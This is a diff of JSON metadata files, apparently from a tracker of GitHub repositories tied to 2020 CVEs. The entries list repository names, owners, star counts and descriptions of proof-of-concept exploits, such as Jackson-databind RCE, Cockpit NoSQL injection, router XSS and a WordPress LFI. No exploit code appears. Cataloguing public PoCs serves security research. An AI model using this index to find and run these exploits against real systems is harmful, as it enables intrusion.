+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "alertmanager",
+ "authentication",
+ "bitnami",
+ "cassandra",
+ "cve",
+ "docker",
+ "exploit",
+ "geode",
+ "kasm",
+ "nvidia",
+ "phppgadmin",
+ "privilege-escalation",
+ "prometheus",
+ "root",
+ "security",
+ "solr"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-35262.json b/2020/CVE-2020-35262.json
new file mode 100644
index 0000000000..adfe9e00a2
--- /dev/null
+++ b/2020/CVE-2020-35262.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 327099437,
+ "name": "CVE-2020-35262",
+ "full_name": "the-girl-who-lived\/CVE-2020-35262",
+ "owner": {
+ "login": "the-girl-who-lived",
+ "id": 42164898,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42164898?v=4",
+ "html_url": "https:\/\/github.com\/the-girl-who-lived"
+ },
+ "html_url": "https:\/\/github.com\/the-girl-who-lived\/CVE-2020-35262",
+ "description": "Cross Site Scripting (XSS) in Digisol DG-HR3400 Router",
+ "fork": false,
+ "created_at": "2021-01-05T19:32:31Z",
+ "updated_at": "2023-09-28T11:23:40Z",
+ "pushed_at": "2021-01-05T19:46:55Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-35314.json b/2020/CVE-2020-35314.json
index 84c99be74f..29851fb421 100644
--- a/2020/CVE-2020-35314.json
+++ b/2020/CVE-2020-35314.json
@@ -1,4 +1,34 @@
[
+ {
+ "id": 428884974,
+ "name": "wonderplugin",
+ "full_name": "ybdegit2020\/wonderplugin",
+ "owner": {
+ "login": "ybdegit2020",
+ "id": 60058102,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60058102?v=4",
+ "html_url": "https:\/\/github.com\/ybdegit2020"
+ },
+ "html_url": "https:\/\/github.com\/ybdegit2020\/wonderplugin",
+ "description": "cve-2020-35314,一个带phpcode的zip文件",
+ "fork": false,
+ "created_at": "2021-11-17T02:39:06Z",
+ "updated_at": "2021-11-17T03:30:57Z",
+ "pushed_at": "2021-11-17T03:30:55Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 543884853,
"name": "WonderCMS-CVE-2020-35314",
diff --git a/2020/CVE-2020-35488.json b/2020/CVE-2020-35488.json
index a32450ec4b..a60a559fbc 100644
--- a/2020/CVE-2020-35488.json
+++ b/2020/CVE-2020-35488.json
@@ -28,5 +28,40 @@
"watchers": 1,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 416451757,
+ "name": "nxlog-ubuntu-githubactions",
+ "full_name": "githubfoam\/nxlog-ubuntu-githubactions",
+ "owner": {
+ "login": "githubfoam",
+ "id": 33146150,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33146150?v=4",
+ "html_url": "https:\/\/github.com\/githubfoam"
+ },
+ "html_url": "https:\/\/github.com\/githubfoam\/nxlog-ubuntu-githubactions",
+ "description": "nxlog ubuntu CVE-2020-35488",
+ "fork": false,
+ "created_at": "2021-10-12T18:25:17Z",
+ "updated_at": "2021-10-21T20:49:27Z",
+ "pushed_at": "2021-10-24T17:09:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "nxlog-ce",
+ "ubuntu1804",
+ "ubuntu2004"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-35489.json b/2020/CVE-2020-35489.json
index 89f90d9c0e..995c190f08 100644
--- a/2020/CVE-2020-35489.json
+++ b/2020/CVE-2020-35489.json
@@ -35,6 +35,36 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 360400196,
+ "name": "Check-WP-CVE-2020-35489",
+ "full_name": "X0UCYB3R\/Check-WP-CVE-2020-35489",
+ "owner": {
+ "login": "X0UCYB3R",
+ "id": 82994877,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82994877?v=4",
+ "html_url": "https:\/\/github.com\/X0UCYB3R"
+ },
+ "html_url": "https:\/\/github.com\/X0UCYB3R\/Check-WP-CVE-2020-35489",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-04-22T05:17:16Z",
+ "updated_at": "2023-09-28T11:27:02Z",
+ "pushed_at": "2021-04-22T05:17:26Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 647539288,
"name": "wp_CVE-2020-35489_checker",
diff --git a/2020/CVE-2020-35498.json b/2020/CVE-2020-35498.json
new file mode 100644
index 0000000000..3529a88ddc
--- /dev/null
+++ b/2020/CVE-2020-35498.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 338203663,
+ "name": "cve-2020-35498-flag",
+ "full_name": "freddierice\/cve-2020-35498-flag",
+ "owner": {
+ "login": "freddierice",
+ "id": 2191702,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2191702?v=4",
+ "html_url": "https:\/\/github.com\/freddierice"
+ },
+ "html_url": "https:\/\/github.com\/freddierice\/cve-2020-35498-flag",
+ "description": "Flag the cve-2020-35498 attack",
+ "fork": false,
+ "created_at": "2021-02-12T02:08:01Z",
+ "updated_at": "2021-02-12T19:38:47Z",
+ "pushed_at": "2021-02-12T17:53:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-35545.json b/2020/CVE-2020-35545.json
new file mode 100644
index 0000000000..10068afe52
--- /dev/null
+++ b/2020/CVE-2020-35545.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 389169410,
+ "name": "CVE-2020-35545",
+ "full_name": "bousalman\/CVE-2020-35545",
+ "owner": {
+ "login": "bousalman",
+ "id": 16021440,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16021440?v=4",
+ "html_url": "https:\/\/github.com\/bousalman"
+ },
+ "html_url": "https:\/\/github.com\/bousalman\/CVE-2020-35545",
+ "description": "Spotweb 1.4.9 - 'search' SQL Injection",
+ "fork": false,
+ "created_at": "2021-07-24T18:12:35Z",
+ "updated_at": "2021-07-24T18:13:12Z",
+ "pushed_at": "2021-07-24T18:13:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-35682.json b/2020/CVE-2020-35682.json
new file mode 100644
index 0000000000..2cff923d5d
--- /dev/null
+++ b/2020/CVE-2020-35682.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 344470743,
+ "name": "CVE-2020-35682",
+ "full_name": "its-arun\/CVE-2020-35682",
+ "owner": {
+ "login": "its-arun",
+ "id": 20841421,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20841421?v=4",
+ "html_url": "https:\/\/github.com\/its-arun"
+ },
+ "html_url": "https:\/\/github.com\/its-arun\/CVE-2020-35682",
+ "description": "SD-91948: CVE-2020-35682: Authentication Bypass Vulnerability during SAML login in ServiceDesk Plus.",
+ "fork": false,
+ "created_at": "2021-03-04T12:43:01Z",
+ "updated_at": "2024-02-14T21:47:53Z",
+ "pushed_at": "2021-03-04T12:47:46Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-35713.json b/2020/CVE-2020-35713.json
new file mode 100644
index 0000000000..ff4b185774
--- /dev/null
+++ b/2020/CVE-2020-35713.json
@@ -0,0 +1,35 @@
+[
+ {
+ "id": 331538426,
+ "name": "CVE-2020-35713",
+ "full_name": "Al1ex\/CVE-2020-35713",
+ "owner": {
+ "login": "Al1ex",
+ "id": 38161463,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4",
+ "html_url": "https:\/\/github.com\/Al1ex"
+ },
+ "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-35713",
+ "description": "CVE-2020-35713",
+ "fork": false,
+ "created_at": "2021-01-21T06:39:58Z",
+ "updated_at": "2023-09-28T11:24:10Z",
+ "pushed_at": "2021-01-21T06:40:15Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "belkin",
+ "cve-2020-35713"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-35717.json b/2020/CVE-2020-35717.json
new file mode 100644
index 0000000000..e5756d0193
--- /dev/null
+++ b/2020/CVE-2020-35717.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 325946157,
+ "name": "cve-2020-35717",
+ "full_name": "hmartos\/cve-2020-35717",
+ "owner": {
+ "login": "hmartos",
+ "id": 13253656,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13253656?v=4",
+ "html_url": "https:\/\/github.com\/hmartos"
+ },
+ "html_url": "https:\/\/github.com\/hmartos\/cve-2020-35717",
+ "description": "Showcase repository for CVE-2020-35717",
+ "fork": false,
+ "created_at": "2021-01-01T08:53:53Z",
+ "updated_at": "2023-03-09T00:13:18Z",
+ "pushed_at": "2021-01-01T08:54:35Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-35729.json b/2020/CVE-2020-35729.json
new file mode 100644
index 0000000000..70933aff24
--- /dev/null
+++ b/2020/CVE-2020-35729.json
@@ -0,0 +1,36 @@
+[
+ {
+ "id": 356187039,
+ "name": "CVE-2020-35729",
+ "full_name": "Al1ex\/CVE-2020-35729",
+ "owner": {
+ "login": "Al1ex",
+ "id": 38161463,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4",
+ "html_url": "https:\/\/github.com\/Al1ex"
+ },
+ "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-35729",
+ "description": "CVE-2020-35729",
+ "fork": false,
+ "created_at": "2021-04-09T07:59:43Z",
+ "updated_at": "2023-09-28T11:26:38Z",
+ "pushed_at": "2021-04-09T08:00:19Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2020-35729",
+ "exploit",
+ "klogserver"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-35749.json b/2020/CVE-2020-35749.json
new file mode 100644
index 0000000000..25058e2b0c
--- /dev/null
+++ b/2020/CVE-2020-35749.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 456180379,
+ "name": "Wordpress-CVE-2020-35749",
+ "full_name": "M4xSec\/Wordpress-CVE-2020-35749",
+ "owner": {
+ "login": "M4xSec",
+ "id": 57313495,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57313495?v=4",
+ "html_url": "https:\/\/github.com\/M4xSec"
+ },
+ "html_url": "https:\/\/github.com\/M4xSec\/Wordpress-CVE-2020-35749",
+ "description": "Wordpress Plugin Simple Job Board 2.9.3 LFI Vulnerability (CVE-2020-35749) proof of concept exploit ",
+ "fork": false,
+ "created_at": "2022-02-06T14:52:22Z",
+ "updated_at": "2023-09-28T11:35:44Z",
+ "pushed_at": "2022-02-07T10:54:22Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-3580.json b/2020/CVE-2020-3580.json
index fc1da73158..96913ec168 100644
--- a/2020/CVE-2020-3580.json
+++ b/2020/CVE-2020-3580.json
@@ -1,4 +1,71 @@
[
+ {
+ "id": 380125389,
+ "name": "CVE-2020-3580",
+ "full_name": "Hudi233\/CVE-2020-3580",
+ "owner": {
+ "login": "Hudi233",
+ "id": 20939673,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20939673?v=4",
+ "html_url": "https:\/\/github.com\/Hudi233"
+ },
+ "html_url": "https:\/\/github.com\/Hudi233\/CVE-2020-3580",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-06-25T04:39:30Z",
+ "updated_at": "2023-11-02T09:30:50Z",
+ "pushed_at": "2021-06-25T10:42:03Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 380934342,
+ "name": "CVE-2020-3580",
+ "full_name": "adarshvs\/CVE-2020-3580",
+ "owner": {
+ "login": "adarshvs",
+ "id": 24226460,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24226460?v=4",
+ "html_url": "https:\/\/github.com\/adarshvs"
+ },
+ "html_url": "https:\/\/github.com\/adarshvs\/CVE-2020-3580",
+ "description": "Automated bulk IP or domain scanner for CVE 2020 3580. Cisco ASA and FTD XSS hunter.",
+ "fork": false,
+ "created_at": "2021-06-28T06:51:26Z",
+ "updated_at": "2024-01-11T10:01:49Z",
+ "pushed_at": "2021-07-10T12:42:24Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "bugbounty",
+ "bugbounty-tool",
+ "cve-2020-3580",
+ "cve-2020-3580-exploit",
+ "scanner",
+ "xsshunter"
+ ],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 3
+ },
{
"id": 506850561,
"name": "CVE-2020-3580",
diff --git a/2020/CVE-2020-35846.json b/2020/CVE-2020-35846.json
new file mode 100644
index 0000000000..f0f5129e56
--- /dev/null
+++ b/2020/CVE-2020-35846.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 389266363,
+ "name": "CVE-2020-35846",
+ "full_name": "JohnHammond\/CVE-2020-35846",
+ "owner": {
+ "login": "JohnHammond",
+ "id": 6288722,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6288722?v=4",
+ "html_url": "https:\/\/github.com\/JohnHammond"
+ },
+ "html_url": "https:\/\/github.com\/JohnHammond\/CVE-2020-35846",
+ "description": "Python PoC for CVE-2020-35846 targeting Cockpit 0.11.1",
+ "fork": false,
+ "created_at": "2021-07-25T05:05:14Z",
+ "updated_at": "2023-09-28T11:29:48Z",
+ "pushed_at": "2021-07-25T05:28:51Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 393142417,
+ "name": "CVE-2020-35846",
+ "full_name": "0z09e\/CVE-2020-35846",
+ "owner": {
+ "login": "0z09e",
+ "id": 62566206,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62566206?v=4",
+ "html_url": "https:\/\/github.com\/0z09e"
+ },
+ "html_url": "https:\/\/github.com\/0z09e\/CVE-2020-35846",
+ "description": "Cockpit CMS 0.11.1 NoSQL Injection to Remote Code Execution",
+ "fork": false,
+ "created_at": "2021-08-05T18:48:52Z",
+ "updated_at": "2023-07-11T15:19:07Z",
+ "pushed_at": "2021-08-06T14:00:14Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-36079.json b/2020/CVE-2020-36079.json
new file mode 100644
index 0000000000..6bfd2ac75e
--- /dev/null
+++ b/2020/CVE-2020-36079.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 337797858,
+ "name": "CVE-2020-36079.",
+ "full_name": "azizalshammari\/CVE-2020-36079.",
+ "owner": {
+ "login": "azizalshammari",
+ "id": 63168519,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63168519?v=4",
+ "html_url": "https:\/\/github.com\/azizalshammari"
+ },
+ "html_url": "https:\/\/github.com\/azizalshammari\/CVE-2020-36079.",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-10T17:21:10Z",
+ "updated_at": "2021-03-03T14:34:32Z",
+ "pushed_at": "2021-02-10T17:25:39Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-36109.json b/2020/CVE-2020-36109.json
index adc362c59c..eb06c65f9f 100644
--- a/2020/CVE-2020-36109.json
+++ b/2020/CVE-2020-36109.json
@@ -28,5 +28,35 @@
"watchers": 2,
"score": 0,
"subscribers_count": 2
+ },
+ {
+ "id": 483797917,
+ "name": "CVE-2020-36109-POC",
+ "full_name": "sunn1day\/CVE-2020-36109-POC",
+ "owner": {
+ "login": "sunn1day",
+ "id": 99871004,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99871004?v=4",
+ "html_url": "https:\/\/github.com\/sunn1day"
+ },
+ "html_url": "https:\/\/github.com\/sunn1day\/CVE-2020-36109-POC",
+ "description": "CVE-2020-36109 PoC causing DoS",
+ "fork": false,
+ "created_at": "2022-04-20T20:07:51Z",
+ "updated_at": "2023-09-28T11:38:09Z",
+ "pushed_at": "2022-04-20T20:10:11Z",
+ "stargazers_count": 15,
+ "watchers_count": 15,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 15,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-36179.json b/2020/CVE-2020-36179.json
new file mode 100644
index 0000000000..06c2d7a191
--- /dev/null
+++ b/2020/CVE-2020-36179.json
@@ -0,0 +1,37 @@
+[
+ {
+ "id": 328321384,
+ "name": "CVE-2020-36179",
+ "full_name": "Al1ex\/CVE-2020-36179",
+ "owner": {
+ "login": "Al1ex",
+ "id": 38161463,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4",
+ "html_url": "https:\/\/github.com\/Al1ex"
+ },
+ "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-36179",
+ "description": "CVE-2020-36179~82 Jackson-databind SSRF&RCE",
+ "fork": false,
+ "created_at": "2021-01-10T06:47:49Z",
+ "updated_at": "2024-04-01T15:17:38Z",
+ "pushed_at": "2021-01-10T06:48:53Z",
+ "stargazers_count": 79,
+ "watchers_count": 79,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2020-36179",
+ "jackson-databind",
+ "rce",
+ "ssrf"
+ ],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 79,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-36184.json b/2020/CVE-2020-36184.json
new file mode 100644
index 0000000000..cf02dab7e8
--- /dev/null
+++ b/2020/CVE-2020-36184.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 328567970,
+ "name": "CVE-2020-36184",
+ "full_name": "Al1ex\/CVE-2020-36184",
+ "owner": {
+ "login": "Al1ex",
+ "id": 38161463,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4",
+ "html_url": "https:\/\/github.com\/Al1ex"
+ },
+ "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-36184",
+ "description": "CVE-2020-36184 && Jackson-databind RCE",
+ "fork": false,
+ "created_at": "2021-01-11T06:22:25Z",
+ "updated_at": "2023-11-03T10:11:36Z",
+ "pushed_at": "2021-01-11T06:22:44Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-36188.json b/2020/CVE-2020-36188.json
new file mode 100644
index 0000000000..563d120649
--- /dev/null
+++ b/2020/CVE-2020-36188.json
@@ -0,0 +1,36 @@
+[
+ {
+ "id": 328569446,
+ "name": "CVE-2020-36188",
+ "full_name": "Al1ex\/CVE-2020-36188",
+ "owner": {
+ "login": "Al1ex",
+ "id": 38161463,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4",
+ "html_url": "https:\/\/github.com\/Al1ex"
+ },
+ "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-36188",
+ "description": "CVE-2020-36188 &&Jackson-databind RCE",
+ "fork": false,
+ "created_at": "2021-01-11T06:29:38Z",
+ "updated_at": "2023-09-28T11:23:50Z",
+ "pushed_at": "2021-01-11T06:29:59Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2020-36188",
+ "jackson-databind",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-36287.json b/2020/CVE-2020-36287.json
new file mode 100644
index 0000000000..f4fd136f81
--- /dev/null
+++ b/2020/CVE-2020-36287.json
@@ -0,0 +1,39 @@
+[
+ {
+ "id": 391787530,
+ "name": "CVE-2020-36287",
+ "full_name": "f4rber\/CVE-2020-36287",
+ "owner": {
+ "login": "f4rber",
+ "id": 53954664,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53954664?v=4",
+ "html_url": "https:\/\/github.com\/f4rber"
+ },
+ "html_url": "https:\/\/github.com\/f4rber\/CVE-2020-36287",
+ "description": "The dashboard gadgets preference resource of the Atlassian gadgets plugin used in Jira Server and Jira Data Center before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to obtain gadget related settings via a missing permissions check.",
+ "fork": false,
+ "created_at": "2021-08-02T01:52:39Z",
+ "updated_at": "2023-03-30T02:40:48Z",
+ "pushed_at": "2021-08-08T16:26:11Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "atlassian",
+ "bruteforce",
+ "cve-2020-36287",
+ "enumeration",
+ "jira",
+ "python3"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-36518.json b/2020/CVE-2020-36518.json
new file mode 100644
index 0000000000..6a68d8f676
--- /dev/null
+++ b/2020/CVE-2020-36518.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 472514562,
+ "name": "boot-jackson-cve",
+ "full_name": "ghillert\/boot-jackson-cve",
+ "owner": {
+ "login": "ghillert",
+ "id": 685363,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/685363?v=4",
+ "html_url": "https:\/\/github.com\/ghillert"
+ },
+ "html_url": "https:\/\/github.com\/ghillert\/boot-jackson-cve",
+ "description": "Reproduction of CVE-2020-36518 in Spring Boot 2.5.10",
+ "fork": false,
+ "created_at": "2022-03-21T21:13:28Z",
+ "updated_at": "2022-03-21T22:09:38Z",
+ "pushed_at": "2022-03-21T22:16:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-3992.json b/2020/CVE-2020-3992.json
index 66572b835b..61b0d5f5e8 100644
--- a/2020/CVE-2020-3992.json
+++ b/2020/CVE-2020-3992.json
@@ -35,5 +35,35 @@
"watchers": 41,
"score": 0,
"subscribers_count": 4
+ },
+ {
+ "id": 335992894,
+ "name": "VMware_ESXI_OpenSLP_PoCs",
+ "full_name": "dgh05t\/VMware_ESXI_OpenSLP_PoCs",
+ "owner": {
+ "login": "dgh05t",
+ "id": 55125726,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55125726?v=4",
+ "html_url": "https:\/\/github.com\/dgh05t"
+ },
+ "html_url": "https:\/\/github.com\/dgh05t\/VMware_ESXI_OpenSLP_PoCs",
+ "description": "CVE-2020-3992 & CVE-2019-5544",
+ "fork": false,
+ "created_at": "2021-02-04T15:15:22Z",
+ "updated_at": "2024-06-21T00:09:06Z",
+ "pushed_at": "2021-02-05T06:40:50Z",
+ "stargazers_count": 59,
+ "watchers_count": 59,
+ "has_discussions": false,
+ "forks_count": 22,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 22,
+ "watchers": 59,
+ "score": 0,
+ "subscribers_count": 2
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-4464.json b/2020/CVE-2020-4464.json
index cd0b0c3fa6..ed9c34c9ba 100644
--- a/2020/CVE-2020-4464.json
+++ b/2020/CVE-2020-4464.json
@@ -1,4 +1,34 @@
[
+ {
+ "id": 397176290,
+ "name": "WebSphere-WSIF-gadget",
+ "full_name": "silentsignal\/WebSphere-WSIF-gadget",
+ "owner": {
+ "login": "silentsignal",
+ "id": 4179629,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4179629?v=4",
+ "html_url": "https:\/\/github.com\/silentsignal"
+ },
+ "html_url": "https:\/\/github.com\/silentsignal\/WebSphere-WSIF-gadget",
+ "description": "CVE-2020-4464 \/ CVE-2020-4450",
+ "fork": false,
+ "created_at": "2021-08-17T08:44:49Z",
+ "updated_at": "2024-01-29T17:31:39Z",
+ "pushed_at": "2021-08-24T15:02:19Z",
+ "stargazers_count": 33,
+ "watchers_count": 33,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 33,
+ "score": 0,
+ "subscribers_count": 6
+ },
{
"id": 493475207,
"name": "CVE-2020-4464-and-CVE-2020-4450",
diff --git a/2020/CVE-2020-5248.json b/2020/CVE-2020-5248.json
index 091cc5ccfb..785a8e1de4 100644
